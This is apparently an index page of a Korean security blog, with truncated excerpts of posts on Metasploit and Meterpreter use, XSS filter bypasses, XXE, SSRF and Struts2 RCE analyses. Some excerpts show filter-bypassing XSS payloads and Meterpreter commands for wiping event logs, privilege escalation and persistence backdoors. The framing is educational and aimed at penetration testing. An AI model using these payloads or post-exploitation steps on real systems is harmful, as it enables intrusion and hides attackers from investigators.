저는 대체로 테스트폰에 작업할 때 meterpreter shell을 연결해놓고 사용합니다. 뭐랄까 ssh는 굳이 열어두고 싶진 않고 adb는 케이블 건드려서 끊길때 마다 불편해서 그냥 exploit app 하나 내려놓고 필요할때마다 실행하죠. remote adb 앱들이 있긴한데, 당시에는 손이 좀 안갔습니다. 지금은 ...

BugCrowd HUNT - 버그 바운티를 위한 ZAP/Burp Extension

오늘은 유명한 버그바운티 사이트 중 하나인 BugCrowd에서 만들고 배포하는 HUNT에 대한 이야기를 할까 합니다. HUNT BugCrowd에서 만든 Bug hunting을 도와주는 Extension으로 분석에 많이 사용되는 Burp, ZAP에 확장 기능으로 설치할 수 있습니다. Passive scan의 성향을 띄며 Pr...

Metasploit web delivery 모듈을 이용한 Command line에서 meterpreter session 만들기

어떤 방법이던 metasploit을 사용하지 않고 쉘 권한을 얻었을 때 metasploit 과 연결하려면 어떻게 해야할까요? venom으로 만든 페이로드를 실행해서 연결할 수도 있고, 다른 취약점을 발생시키든 여러가지 방법이 있을겁니다. 오늘은 그러한 방법중에 하나이며, 굉장히 쉽게 세션을 열 수 있는 방법인 web del...

Android 4.4(KitKat)에서 NetHunter 설치하기

간만에 테스트폰 한대에 넷헌터나 깔아서 놀아볼까 하고 설치하려고 보니.. 버전적인 문제가 생겼었습니다. 바로 넷헌터가 공식적으로 롤리팝 이상부터 지원을하는데.. 제 대다수 테스트 기기들이 그 아래 버전이 많아 문제가 될 가능성이 보였습니다. https://...

G3 시리즈 루팅 스크립트 살펴보기(LG Root Script.bat )

최근에 예전에 쓰던 폰 하나를 루팅했습니다. xda 뒤적이다가 간단한 스크립트 발견했고, 보아하니 해당 스크립트로 루팅한분들이 좀 계셔서 제 G3 A를 루팅했죠. (비하인드가 있는 폰이지요.. 하핳, 부활한 폰..) 진행 과정 중 USB 디버깅이 자꾸 풀려서 스크립트 보면서 필요한 부분 수정해가면서 했었는데, 보다보니 E...

HTTPS/HTTP Mixed Content (섞인 동적 콘텐츠 [File] 를 읽어오는 것을 차단했습니다.)

어제 블로그를 https로 변경 후 소소한 문제가 찾아왔습니다. 바로 js, css 등 리소스들의 주소가 https로 강제 치환되고 덕분에 https가 없는 곳에서 불러온 파일들은 로드되지 않아 일부 기능이 동작하지 않았었죠. 물론 크게 지장있는 부분은 아니라 천천히 수정하겠지만..어떤것이 문제였고 어떻게 해결해야할지 작성...

Bypass XSS Protection with fake tag and data: (가짜 태그와 data 구문을 이용한 XSS 우회기법)

퇴근길에 트위터보다가 재미있는 XSS 페이로드 찾아서 글 작성합니다. 요즘 바쁘고 두통도 심하고해서 신경 못쓰나 싶었는데, 또 이런글 보고 이러면 아픈것도 사라지네요. 자 빠르게 시작하죠. XSS Payload : < script/”<a”/src=data:=”.<a,[45].some(alert)> 제...

Bypass XSS Protection with string+slash

최근 oioi로 부터 XSS 페이로드를 하나 공유 받았습니다. 특이한 부분이 2가지가 있는데, 내용 한번 살펴보도록 하겠습니다. <svg </onload ="1> (_=prompt,_(1)) ""> Event Handler 우회 패턴 기존 svg/onload 구문과 유사하지만, 이벤트 핸들러 필터...

MITM Proxy server in Ruby (evil-proxy와 rails를 이용한 WASE 트래픽 수집 구간 만들기)

WASE를 만들면서 MITM Proxy로 트래픽을 수집하는 서버를 만들었는데요, 이 과정에서 알아봤던거랑 기반(?)이 되었던 심플한 저의 코드 관련해서 글 작성합니다. 아 추가로.. WASE 만드는 프로젝트(?)는 전체적인 구조를 좀 많이 변경했습니다. 혹시라도 좋은 성과가 있다면.. 공유드리도록 할게요. (물론 리밋) ...

URL Hash(#) 을 이용한 XSS 우회기법

최근에 Facebook의 Stored XSS 취약점 관련 버그바운티 리포트가 올라왔습니다. og tag를 이용해서 xss까지 진행된 케이스인데, 생각보다 조금 의외의 내용이라 글로 공유합니다. Open Graph(og)는 웹 페이지에서 메타정보를 제공하는 프로토콜로 meta 태그에 페이지에 대한 정보를 담아 다른 어플...

0x0c(^L)를 이용한 XSS 우회 기법(no slash, no blank)

간만에 XSS Vector로 포스팅합니다. 최근에 나온 기법은 아니고, 좀 오래된거긴 하지만.. 모르고있었네요 =_= 트윗 공유해주신 +Dakkar Key 감사합니다 :) (오 글에 구글 플러스 멘션이 되다니..) 0x0c 문자를 통해서 slash, blank 사용이 어려운 경우 활용할 수 있습니다. event han...

[HACKING] Bug Bounty를 위한 WASE(Web Audit Search Engine) 만들기 [2] - Burp suite와 Elastic search 연동하기

우선 burp bapps에 올라와 있는 extension 으로는 2가지가 있습니다. elastic burp와 report to elastic 입니다. Burp extension for elastic search 1. Elastic Burp Burp suite를 거쳐가는 데이터에 대해 ES로 데이터를 누적합니다. https...

[HACKING] Bug Bounty를 위한 WASE(Web Audit Search Engine) 만들기 [1] - Elastic search와 ruby-rails

요즘들어 버그바운티에 대한 생각이 조금 깊어졌습니다. 일을 하는 것 이외에도 무언가 가치를 만들 수 있겠다라는 생각 때문이죠. (그냥 돈을 더 벌고싶다고 그래 =_=) 그러나 안타깝게도 시간은 항상 제한적이고, 저의 시간은 매우 모자랍니다. 그래서.. VAHA(http://vaha.hahwul.com )에 이어 버그바운티를...

[HACKING] Memcached reflection DOS attack 분석

요즘 memcached 서버 DOS 취약점으로 잠깐 시끌벅적했습니다. 어제 새벽 pastebin에 C기반 PoC 코드랑 shodan에서 조회한 서버 내역이 올라왔는데요. 오늘은 그 내용 가지고 글 좀 써볼까 합니다. DΛNIΞL이 twit 올린거 보고 훑어봤는데, 부담가지 않는 내용인 것 같네요. ...

[HACKING] Adobe Flash Player NetConnection Type Confusion(CVE-2015-0336) 분석

오랜만에 취약점 분석글을 작성합니다. 별다른건 아니고 x90c와 메일로 이야기하던 건이 있는데, 퇴근길에 보다보니 포스팅거리가 되어버렸네요. (아깝잖아요..) 오늘 포스팅할 글은 2015년도 Adobe Flash Player에서의 Type Confusion 취약점입니다. Type Confusion? 우선 Type Co...

[HACKING] TCP‑Starvation Attack (DOS Attack on TCP Sessions)

요즘은 edb쪽 문서를 자주 보진 못하지만.. 주말부터 틈날때마다 하나 봐둔게 있습니다. 오늘 정리해서 작성해봅니다. TCP-Stravation Attack 입니다. What is? TCP-Stravation Attack은 TCP 통신간 발생하는 DOS 취약점입니다. 굉장히 오랜 기간동안 감춰져있었고, 최근에 이야기되고 ...

[HACKING] iOS App 정적 분석도구 IDB (Ruby gem package "IDB" for iOS Static Analysis)

최근에 루비 패키지 중 재미있는 툴을 하나 발견헀습니다. iOS 분석용 툴인데, Cycript, pcviewer, dumpdcrypt 등 분석 툴들을 활용해서 자동으로 분석해주고, 이를 한군데 모아서 볼 수 있는 정적분석 도구입니다. 개별적으로 툴 돌려가면서 판단하는 것도 좋지만, 한번에 잘 정리된 툴은 불필요한 시간을 줄...

Metasploit Modules for EternalSynergy / EternalRomance / EternalChampion

지난 주말 Rapid7 github를 둘러보다가 재미있는 Metasploit 내 재미있는 pull request를 보았었습니다. https://github.com/rapid7/metasploit-framework/pull/9473 Shadow Brokers 가 공개한 Eternal 시리즈에 대한 취약점을 Metas...

Shodan API와 Metasploit을 이용한 Exploiting script - AutoSploit

원래 LanGhost 내용으로 글 써볼까 헀다가, 급 주제를 바꾸어 툴 하나에 대해 이야기하도록 하죠. 오늘은 이번주에 나름 핫했던 AutoSploit입니다. What is AutoSploit? AutoSploit은 원격 호스트에 대한 자동 서칭, Exploit 툴, 스크립트 정도로 생각하시면 좋을 것 같습니다. 파이썬 기...

Metasploit의 alias plugin을 이용하여 resource script를 명령어로 만들기

오늘은 Metasploit의 alias 플러그인데 대한 이야기를 할까 합니다. Alias plugin 미리 긴 명령행과 옵션을 하나의 명령어처럼 별칭으로 지정해두고 사용합니다. 대표적으로 bash에서 bashrc나 bash_profile에 alias로 명령행 정의해두고 사용하죠. 바로 이 기능이 Metasploit에도 플러...

[HACKING] DocumentBuilderFactory XXE 취약점 관련 연구(?) 중간 정리(feat apktool)

아주 오랜만에 글을 씁니다. 작년 말부터 좀 정신없는 일이 있었고, 겸사겸사 VAHA 서비스 손보고 있던지라 블로그에 관심을 많이 못뒀었네요. (http://vaha.hahwul.com ) / 필요한 기능 피드백주세요 본론으로 넘어와서 .. 작년 말즘 안드로이드 개발환경에 대한 공격을 타겟으로 올라온 ParseDroid ...

[HACKING] Analyzing BurpLoader.jar in Burp Suite Pro Crack(Larry Lau version) Part3(Bypass Certificate expiration time)

오랜만에… BurpLoader.jar 분석 3번째 이야기를 할까 합니다. Analysis BurpLoader.jar Part 1 http://www.hahwul.com/2017/06/hacking-analyzing-burploaderjar-in-burp.html Analysis BurpLoader.jar Part 2 ht...

[HACKING] DocumentBuilderFactory XXE Vulnerability 분석(ParseDroid, apktool xxe exploit)

요 며칠 사이에 핫하게 바람이 불고있는 DocumentBuilderFactory XXE 취약점에 대햔 이야기를 할까합니다. checkpoint 글 보고 어제부터 급히 작성하곤 있었는데 생각보다 오래 걸리게 되었네요. ParseDroid and DocumentBuilderFactory vulnerability 먼저 Do...

[WEB HACKING] OOXML XXE with Burp Suite(OOXML XXE 관련 Burp suite Extension)

어제 쓸만한 Burp Extension을 찾았습니다 :) PortSwigger 공식 Github엔 올라와있지만 아직 BApp Store엔 안올라온 OOXML XXE 관련 확장 기능입니다. 이야기에 앞서 해당 툴을 만든 사람은 “maxence-schmitt” 입니다. PortSwigger쪽에서 공식적으로 지원하려하는 것 같...

Reflected XSS를 쉽게 찾자 - Reflector Burp Suite Extension

오늘은 Reflected XSS를 찾는데 있어 탁월한 성능을 보여주는 Reflector에 대한 이야기를 하려고 합니다. Reflector? 공식 Git에는 아래와 같이 소개되어 있습니다. “Burp Suite extension is able to find reflected XSS on page in real-time...

[EXPLOIT] macOS High Sierra root privilege escalation 취약점/버그에 대한 이야기(code metasploit)

오랜만에 글을씁니다. 글감은 항상 적어두지만, 글 쓰기까지가 참 어렵네요. (그냥 바쁘다는 핑계임) 최근 macOS High Sierra 버전에서 권한 상승 취약점이 있었습니다. 일단 매우 간단하며 패스워드 공백으로 root 로그인 반복 시도 시 간헐적으로 넘어가지는 경우였죠. EDB를 보던 중.. 이 취약점에 대한 코드...

[WEB HACKING] SQLite SQL Injection and Payload

최근 예전에 SSRF 올렸던 내용의 확장격인 나름 개인의 연구과제와 Blind XSS 테스팅 툴 만드는 것 때문에 짧은 글로 가끔 포스팅하는 것 같습니다. (시간이 없다는 핑계, 사실 놀거 다 놀고 있는 느낌..) 아무튼 오늘은 SQLite 에서의 Injection과 Payload에 대한 이야기를 할까합니다. Inject...

Blind XSS(Cross-Site Scripting)와 보안테스팅

오늘은 Blind XSS에 대한 이야기를 잠깐 할까합니다. 보편적인 XSS와 비슷하고, 테스트 방법 또한 비슷하지만, 언제 어디서 우리에게 어떤 결과를 줄지 예측할 수 없는 그런 친구이지요. Blind XSS? 먼저 Blind XSS에 대해 정리하고 시작하죠. XSS에 대해 테스팅할 때 우리는 노출되는 결과, 즉 최종적으...

[EXPLOIT] JAVA SE Web start JNLP XXE 취약점 분석(CVE-2017-10309, feat Metasploit)

요즘 시간내기가 왜이리 어려운건지.. 덕분에 오랜만에 취약점 분석글을 작성하네요. 오늘은 지난 10월 말 공개된 JAVA SE 관련 XXE 취약점에 대해 이야기할까 합니다. Vulnerability Metrics JAVA SE 8 버전 u131 빌드 이전에 발생하는 취약점입니다. XXE를 통해 파일 탈취, SSRF, 코...

BadIntent - Android 취약점 분석을 위한 Burp Suite Extension 📱

BlackHat 자료 보던 중 괜찮은 Android 취약점 분석 도구가 있어 공유드립니다. 아직 자료가 많이 없어 삽질이 좀 많습니다. 양해 부탁드립니다. 오늘 이야기할 툴은 BadIntent입니다. What is BadIntent? BadIntent는 Burp suite의 확장기능입니다. Burp에 BadIntent를 붙...

OWASP Top 10 2017 RC2 Review

지난달 OWASP Top 10 2017년도 버전 RC2가 나왔습니다. RC2 버전은 기존 RC1에서 개선되어 발표되는 버전이고 몇가지 만족스러운 변화가 있었습니다. 오늘은 OWASP Top 10 2017 RC2의 변화된 사항과 개인적인 생각을 전달드리려 합니다. OWASP Top 10 2017 RC2 OWASP github...

[LINUX] Install docker on kali linux(칼리 리눅스에서 도커 설치하기)

Kali Linux 에선 기본 패키지 매니저에 있는 docker 사용이 불가능합니다. 그러다 보니 직접 source.list를 추가하고 dockerproject에서 docker 설치가 필요합니다. 살짝 Virtualbox 설치하는 것과 비슷비슷하죠. Install! 먼저 인증서 처리를 위해 dirmngr를 비롯한 몇가지 ...

가상 Pentest 환경 구성을 위한 metasploitable2 설치

가상 환경에서의 Pentest 어떻게 생각하시나요? 분명 실제 상황과 느낌도 다르고 불안한감도 없어 장난감 같은 느낌이 들겁니다. 사람이 미리 취약하게 만들어둔 시스템을 공격하는게 무슨 의미가 있는가 라는 질문도 받습니다. 목검은 다듬어진 나무지만 누가쥐느냐에 따라 장난감일 수도 있고, 무기일 수도 있습니다. 숙련된 사람이...

Bypass DOM XSS Filter/Mitigation via Script Gadgets

최근 Blackhat2017 USA에서 “Breaking XSS mitigations via Script Gadgets” 라는 제목으로 XSS 관련 발표가 있었습니다. XSS 우회패턴 만들때 도움될 수 있는 부분이니 정리해서 포스팅 작성합니다. 앞서 발표자료에 이런말이 있습니다. Fixing XSS is hard. ...

[SYSTEM HACKING] lynis를 이용한 시스템 취약점 스캔(System vulnerability Scanning with lynis)

Install 설치는 다른 툴과 동일하게 아주 심플합니다. CISOfy의 github를 이용해도 되고 패키지 매니저를 이용해도 됩니다. #> apt-get install lynis or #> git clone https://github.com/CISOfy/lynis Usage 크게 2가지 옵션이 존재합니다....

XCode Simulator에 App(.ipa) 파일 설치하기

취약점 테스트 기기로 쓰는 iOS 디바이스에 문제가 있어 Simulator를 알아보던 중 간단한 팁이 있어 작성합니다. 일반적으로 Simulator에 Xcode로 컴파일한 앱이 아니면 설치가 불가능합니다. 다만 약간의 트릭을 쓰면 쉽게 가능하지만요. 오늘은 app 파일인 .ipa(app)으로 Xcode Simulator에 설...

[LINUX] Make a Persistent Live OS USB(비 휘발성 Live OS 만들기)

파티션의 Label이 persistence로 지정하고 persistence.conf 를 작성해주면 persistence 파티션에 변경사항을 기록하며 LiveOS지만 데이터 저장이 가능해집니다. Step1. Persistence Partition 설정하기 먼저 기존 Live OS를 부팅합니다. 그다음 파티션 도구를 이용해 파...

Metasploit + OpenVAS 연동 (using Docker)

메모해둘겸 작성합니다. 예전엔 직접 하나하나 해야해서 귀찮았지만 이젠 Docker로 편하게 설치합시다. docker run -d \ -p 443:443 \ -p 9390:9390 \ --name openvas mikesplain/openvas docker ip의 9390 포트로 접근 시 관리 페이지 확인이 가능합니다. ...

[HACKING] Kali Live OS를 이용한 Windows, Linux 물리 접근 해킹

Live USB 를 이용한 물리적인 해킹 시 사용할만한 간단한 툴킷 하나 만드려고 하는김에 메모차원으로 포스팅 작성합니다. 원활한 이미지 캡쳐를 위해 전 가상환경에서 진행합니다. (타겟은 Windows7 중심으로.. ) 시작하기 앞서 Windows VM에 Kali live CD를 넣어주고 CD 우선 부팅으로 칼리를 부팅합...

[WEB HACKING] Struts2 RCE(CVE-2017-5638, S2-045) 테스트 및 docker file 공유

매번 Struts2 관련 취약점이 나올때마다 포스팅을 했던 것 같은데요. 오늘 체크하다보니 docker hub에 취약 App 설정이 올라와있어 공유 차 포스팅 작성합니다. 취약점에 대한 내용은 지난 포스팅 참고해주세요. (벌써 반년 넘게 지났군요..) http://www.hahwul.com/2017/03/web-hacki...

[LINUX] How to install xfce on blackarch linux

개인적으로 gnome과 xfce를 좋아합니다. 그중에서도 xfce를 최고로 생각하는데, 그 이유는 클래식의 익숙한 느낌과 빠른 속도 때문이죠. 아쉽게도 blackarch linux의 기본 창 매니저에는 xfce가 포함되어 있지 않습니다. Openbox를 비롯하여 awsome 등 archlinux에서 많이 사용되는 manag...

[LINUX] BlackArch Linux install tip!

최근에 OS 배포판 변경을 시도했다가.. 다시 Debian으로 돌아왔는데요 (이제는 5일씩 밤을샐 수 없네요.. / 인간은 실수를 반복하죠) 관련해서 blackarch 설치 시 Tip 작성해봅니다. (사실 예전에 작성한 포스팅과 별 다를게 없네요) 다른 리눅스 설치하는 것과 동일하지만, 같은 Cli여도 다른 느낌으로! G...

[HACKING] KALI Linux 2017.2 Release Review (무엇이 달라졌을까요?)

지난 주 수요일 Pentesting OS인 Kali Linux의 2017.2 버전이 Release 되었습니다. 중국에 있었던지라 이제야 소식을 접하게 되었네요. 간단하게 리뷰 들어갑니다. 달라진점 1 - Update tools 가장 먼저 눈에 띄는 변화는 툴의 추가입니다. 아무래도 Kali는 BlackArch 등 다른 ...

[WEB HACKING] New attack vectors in SSRF(Server-Side Request Forgery) with URL Parser

Blackhat 2017 USA 자료를 보던 중 하나 흥미로운 발표 자료를 보게되었습니다. 읽고 테스트해보니.. 실무에서 바로 쓸 수 있을정도의 기법이더군요. 오늘은 URL Parser의 문제를 이용한 SSRF 우회기법에 대한 이야기를 하려합니다. 시간나시면 꼭 읽어보세요. https://www.blackhat.com/d...

[HACKING] Android Cloak & Dagger Attack과 Toast Overlay Attack(CVE-2017-0752)

오늘은 최근 말이 많았었던 Android 취약점 2가지에 대한 이야기를 할까 합니다. 바로 Cloak & Dagger Attack 과 Toast Overlay Attack 입니다. 직접 앱으로 만들어서 보여드릴까 하다가.. 그냥 가볍게 포스팅해봅니다. (사실 안드로이드 안만든지 너무 오래됨.. | 심지어 대학생때에도...

Metasploit ipknock를 이용한 hidden meterpreter shell

metasploit에서 payload에 대해 찾아보던 중 ipknock에 대한 내용을 보게되었습니다. 찾아보니 오래전부터 있던 기능이였는데, 잘 활용하면 재미있는 놀거리가 되겠더군요. Matching Modules ================ Name ...

[EXPLOIT] Struts2 REST Plugin XStream RCE 취약점 분석(feat msf) CVE-2017-9805 / S2-052

최근 Sturts2 RCE 취약점이 또 나와 이슈가 되었습니다. 매번 RCE 취약점으로 고생하는거보면 안쓰럽기까지 하네요. 오늘은 따끈따끈한 CVE-2017-9805(REST Plugin XStream RCE) 취약점에 대해 이야기드릴까 합니다. 기존 분석에 비해 내용이 덜 자세하긴 하지만.. 조금이나마 이해에 도움이 되길 ...

Metasploit 의 rhosts에서 Column/Tagging 커스터마이징 하기

Metasploit에서 hosts 명령은 아주 중요한 명령입니다. 타겟에 대한 관리부터, exploit 시 좀 더 편하게 타겟을 RHOSTS에 넣을 수 있어 많이들 사용하시고, 앞으로도 쭉 사용할 수 밖에 없는 기능이죠. 오늘은 hosts 명령에서 열(column) 값을 custom 하고 tag 옵션을 이용해서 조금 더 효...

[WEB HACKING] Retire.js를 이용해 JS Library 취약점 찾기

오늘은 웹 해킹에 유용한 Browser Extension이자 분석툴의 plugin, 독자적으로 동작하는 Node.js app인 Retire.js에 대한 이야기를 할까 합니다. 써온지는 조금 됬으나 어느순간부터 Extension과 툴에 대한 소개를 좀 덜하게 되다보니 좋은 툴인데 이제서야 공유드리게 되네요. 이 프로그램은 웹...

[EXPLOIT] OpenSSL OOB(Out-Of-Bound) Read DOS Vulnerability. Analysis CVE-2017-3731

사실 a2sv의 진단 모듈 추가건으로 알아보다가 이 포스팅을 시작하게 되었습니다. 취약점 특성 상 툴에 적용은 어려워 아쉬운점이 있지만 그래도 쭉 분석해보는 재미있는 시간이 되었네요. 오늘은 올해 나온 OpenSSL Truncated packet 취약점인 CVE-2017-3731에 대해 알아보고 코드단에서 어떤것들이 문제가...

Frida를 소개합니다! 멀티 플랫폼 후킹을 위한 가장 강력한 도구 😎

간만에 툴 소개를 좀 할까 합니다. 오늘 이야기드릴 툴은 Frida 입니다. 파이썬 기반의 라이브러리와 Command로 구성되어 있고 Native App에 대한 후킹을 통해 동적 분석을 진행할 수 있는 도구이죠. What is Frida? Frida는 JS Injection을 이용하여 Windows, macOS, Linux...

Metasploit API와 msfrpcd, 그리고 NodeJS

요즘 metasploit의 rpc에 대해 굉장히 관심이 많습니다. 대표적으론 msgrpc plugin 부터 msfrpcd 데몬까지 metasploit에서 rpc를 이용할 수 있는 방법들을 많이 찾아보고 있지요. 제가 주로 루비를 많이 쓰긴 하지만 취약점을 찾고 보안 테스팅을 하는 직업의 특성 상 Javascript는 익숙해...

Metasploit-Aggregator를 이용한 Meterpreter session 관리하기

Metasploit과 Meterpreter는 굉장히 좋은 툴지만 간간히 불편한점도 존재합니다. 대표적으론 여러 사용자가 세션에 대해 공유할 수 없다는 점과 공격자의 Metasploit에 모든 세션을 담기에는 너무 많아지면 불편해지겠죠. 오늘은 이를 해결할 수 있는 Aggregator에 대한 이야기를 할까 합니다. 사실 이러...

EXIF를 이용하여 이미지 파일 내 Payload 삽입하기

이미지를 처리하는 서비스들을 보면 많은 서비스들이 이미지의 metadata를 사용합니다. 이를 파싱해서 활용하기 때문에 우리는 이를 통해 XSS나 XXE 등 여러 웹 해킹 기법에 사용할 수 있습니다. 가장 쉬운 방법으론 각 OS의 파일 뷰어에서 파일 속성을 열고 직접 편집하여 사용할 수 있지만 이는 약간 귀찮은 작업이고 툴이...

Automatic Exploit&Vulnerability Attack Using db_autopwn.rb

예전에 Metasploit에는 db_autopwn이라는 plugin이 있었습니다. 다수의 시스템을 테스트하고 공격을 수행해야하는 사람 입장에서 아주 유용할 수 있는 plugin이지만 문제가 있어 공식 버전에서 제외된 plugin이죠. 전설처럼 내려오는 db_autopwn 코드를 통해 따로 plugin으로 넣어준다면 지금도 충...

Data Leak Scenario on Meterpreter using ADS

Meterpreter를 가지고 놀던 중 재미있는 사실을 하나 발견했습니다. 뭐 크게 놀라운건 아니지만 meterpreter 에서도 아래 명령이 먹힐줄은 몰랐네요. edit 123.txt cat 123.txt Hello? edit 123.txt:asd cat 123.txt:asd ADS Data edit으로 ADS에 ...

Privilege Escalation on Meterpreter

Meterpreter shell에서 권한상승은 어렵지 않습니다. getsystem 명령 하나면 충분하죠. 그럼 약간 궁금증이 생기게 됩니다. “어떻게 권한 상승을 하는 것일까?” 오늘은 Meterpreter의 권한상승인 getsystem에 대해 알아볼까 합니다. Privilege escalation using ...

[WEB HACKING] Web hacking and vulnerability analysis with firefox!

대부분의 웹 해킹/취약점 분석은 Burp suite, Fiddler와 같은 웹 프록시, 디버거와 웹 브라우저, 그리고 확장 기능들을 이용해 이루어집니다. 저 또한 Burp+Firefox+Addon 조합으로 분석을 진행하지요. 오늘은 Firefox에서만 사용할 수 있는 것들에 대해 이야기할까 합니다. 어차피 취약점 분석에는 ...

[MAD-METASPLOIT] 0x30 - Meterpreter?

What is Meterpreter shell? Metasploit에서 여러 기능을 제공하는 쉘이자 Anti forensic을 위한 shell이라고 볼 수 있습니다. 개인적으로 굉장히 좋아하는 쉘이며 Ruby script(IRB)의 연동으로 현재 주 언어를 Ruby로 쓰고있는 저에게는 최고의 쉘이 아닐까 싶습니다. Mete...

Meterpreter를 이용한 Windows7 UAC 우회하기

Windows system을 침투테스트하다 보면 UAC라는 게정 컨트롤을 만나게 됩니다. 아래에서도 설명드리겠지만 이는 Windows 의 보안 정책 중 하나이며 우리는 이것을 우회해야 더 깊은 내용으로 접근하고 실행할 수 있습니다. 오늘은 Metasploit을 통해 UAC를 우회하는 방법에 대해 이야기할까 합니다. What...

[MAD-METASPLOIT] 0x41 - Armitage

armitage? How to Install? How to use? msgrpc와 armitage ./msfd [] Initializing msfd… [] Running msfd… HAHWUL #> load msgrpc Pass=secret_password [] MSGRPC Service: 127.0.0.1:...

[MAD-METASPLOIT] 0x40 - Anti Forensic

Remove event log meterpreter > clearev [] Wiping 766 records from Application… [] Wiping 1375 records from System… [*] Wiping 346 records from Security… Timestomp meterpreter &g...

[MAD-METASPLOIT] 0x34 - Persistence Backdoor

Persistence backdoor Meterpreter는 Persistence 를 이용하여 시스템에 백도어를 남겨 지속적으로 접근할 수 있는 통로를 만들 수 있습니다. meterpreter > run persistence -h [!] Meterpreter scripts are deprecated. Try post...

[MAD-METASPLOIT] 0x33 - Using post module

Post module 찾기 HAHWUL exploit(easyfilesharing_post) > search type:post platform:windows Matching Modules Name Disclosure Date...

[MAD-METASPLOIT] 0x32 - Privilige Escalation

win_privs를 통한 권한 확인 post/windows/gather/win_privs meterpreter > run post/windows/gather/win_privs Current User Is Admin Is System Is In Local Admin Group UAC Enabled Foreg...

[MAD-METASPLOIT] 0x21 - Browser attack

Autopwn을 이용한 Browser attack autopwn은 웹/모바일 브라우저를 대상으로 여러 Exploit 을 체크하고 실행해주는 모듈입니다. HAHWUL exploit(handler) > search autopwn Matching Modules Name ...

[MAD-METASPLOIT] 0x22 - Malware and Infection

c msfvenom? Metasploit framework 중 일부이며 payload가 담긴 파일(exe, apk, dll 등 여러가지) 생성 및 주입에 사용됩니다. 간단한 명령행으로 편하게 사용할 수 있으니 알아두시면 좋습니다. 주요 옵션군을 정리하면 아래와 같습니다. -x : 감염시킬 프로그램 -p : 삽입할 Payl...

[MAD-METASPLOIT] 0x31 - Migrate & Hiding process

Process Migrate meterpreter > ps Process List PID PPID Name Arch Session User Path — —- —- ...

[MAD-METASPLOIT] 0x20 - Remote Exploit

HAHWUL auxiliary(vnc_login) > db_nmap -PN 192.168.56.101 [] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2017-08-07 15:17 KST [] Nmap: Nmap scan report for 192.168.56.101 [] N...

[MAD-METASPLOIT] 0x12 - Vulnerability Scanning

Vulnerability Scanning auxiliary/scanner/vnc/vnc_login normal VNC Authentication Scanner auxiliary/scanner/vnc/vnc_n...

[MAD-METASPLOIT] 0x11 - Network scanning using Auxiliary Module

Auxiliary module을 통한 정보수집 HAHWUL > db_nmap -PN 192.168.56.101 [] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2017-08-04 18:33 KST [] Nmap: Nmap scan report for 192.168.56.10...

[MAD-METASPLOIT] 0x10 - Port scanning

nmap scan Metasploit Database 사용 하도록 설정하였다면 Msf 내부에서 DB와 연결되는 nmap을 사용할 수 있습니다. nmap에 대한 결과가 Metasploit DB로 들어가 연동되기 때문에 후에 스캔 데이터를 가공하는데 있어 굉장히 편리합니다. HAHWUL auxiliary(syn) > db...

[MAD-METASPLOIT] 0x02 - Database setting and workspace

DB 연동을 하게되면 취약점 정보를 DB에 인덱싱하여 조금 더 빠른 검색을 사용할 수 있고 DB를 통해 taget에 대해서 효율적으로 관리할 수 있어 Metasploit을 사용하는데 있어 굉장히 중요한 요소입니다. PostgreSQL #> su -postgres #> createuser db_user_name ...

[MAD-METASPLOIT] 0x01 - MSF Architecture

Architecture of MSF 제가 구조를 그려봤지만.. 영 실력이 좋진 않네요. 그냥 구글링해서 좋은 이미지 보시길.. 사용 관점에서의 구조부터 보면 user는 여러 interface(console, armigate 등)을 통해 MSF Library로 접근합니다. 해당 부분에서 moudules, pugins, ...

[MAD-METASPLOIT] 0x00 - Metasploit?

[MENU] What is Metasploit? Metasploit Project는 오픈소스기반의 보안취약점, 침투테스트에 사용되는 컴퓨터 보안 프로젝트입니다. 2003년 HD.Moore에 의해 네트워크 툴로 Perm 언어를 통해 개발되었다가 Ruby로 변경 후 Rapid7사에 인수되며 현재의 모습을 갖추게 되었습니다. ...

[METASPLOIT] DB 연동 이후 발생하는 Module database cache not built yet(slow search) 해결하기

Metaploit을 사용하다 보면 Module DB cache로 인해 검색이 느린 경우가 있습니다. 대체로 Metasploit에서 DB 연결을 안할때 발생할 수 있지만 DB 연결이 되어있어도 발생할 수 있는 경우가 있습니다. DB를 연동하지 않은 분들은 아래 링크 참고하셔 연동하시면 말끔하게 사라집니다.(연동하면 장점이 훨씬...

[METASPLOIT] msgrpc 서버를 이용하여 msfconsole과 armitage 연동하기

metasploit의 여러 interface 중 많이들 사용하시는게 msf(metasploit-framework)와 armitage입니다. 각각 cui, gui라는 컨셉을 가지고 있고 한쪽을 선호하시거나 양쪽 모두 선호하시는 케이스 모두 보았습니다. 저 또한 cui 기반인 msf를 선호하지만 침투 대상의 규모가 커질수록 g...

[WEB HACKING] WebKit JSC 취약점을 통한 SOP 우회(WebKit base browser XSS Technique)

요즘 Google Project-zero가 WebKit JSC를 열심히 까고있습니다. 6월부터 오늘까지 WebKit JSC에서만 12개의 이슈가 보고되었죠. 2017-07-25WebKit JSC - ‘arrayProtoFuncSplice’ Uninitialized Memory ReferenceGoogle Secu… 2017...

[HACKING] Closed network infection scenario and Detecting hidden networks (Using USB/Exploit)

어제 EDB를 둘러보던 중 재미있는 문서를 보았는데요. 여러가지 생각을 해보다보니 포스팅으로 작성할만한 것 같아 글을써봅니다. 오늘은 USB와 LNK Exploit을 이용해서 폐쇄망에 침투/감염 시나리오와 Powershell trick과 USB를 이용해 네트워크 구성, 더 상세하겐 내부에서 사용되는 USB의 흐름을 보는 이...

AngularJS Sandbox Escape XSS

AngularJS는 웹 상에서 많이 사용되는 개발 프레임워크입니다. 이런 프레임워크에는 당연히 보안 로직, 정책이 들어가게되죠. 그 중에 대표적인 것은 바로 SandBox 입니다. Sandbox 로 인해 우리는 성공한 공격이 영향력이 없어지는 진귀한 광경을 목격하게되죠. 많은 해커들은 버전별로 AngularJS sandbo...

[METASPLOIT] Writing Custom Plugin for metasploit

최근에 a2sv를 metasploit plugin으로 지원할 생각을 하고있습니다. 모듈 제작이 아닌 plugin 제작으론 경험이 거의 없기에.. 하나하나 찾아보면서 진행하기로 했죠. 겸사겸사 오늘은 간단히 msf plugin 작성법에 대해 메모할까 합니다. 당연히 ruby 기반 framework이기 때문에 ruby로 코딩하...

Metasploit resource script와 ruby code로 커스터마이징 하기

예전부터 저는 Metasploit을 Custom 해서 사용하고 있었습니다. 그리고 올 초 msf의 업데이트로 파일 시스템의 구조가 바뀌면서 Custom 코드가 좀 꼬이게 되었습니다. 그래서 다시 Custom 과정을 거치던 중 재미있는 아이디어가 생각나서 포스팅 작성해봅니다. 바로 resource script 를 이용해서 어...

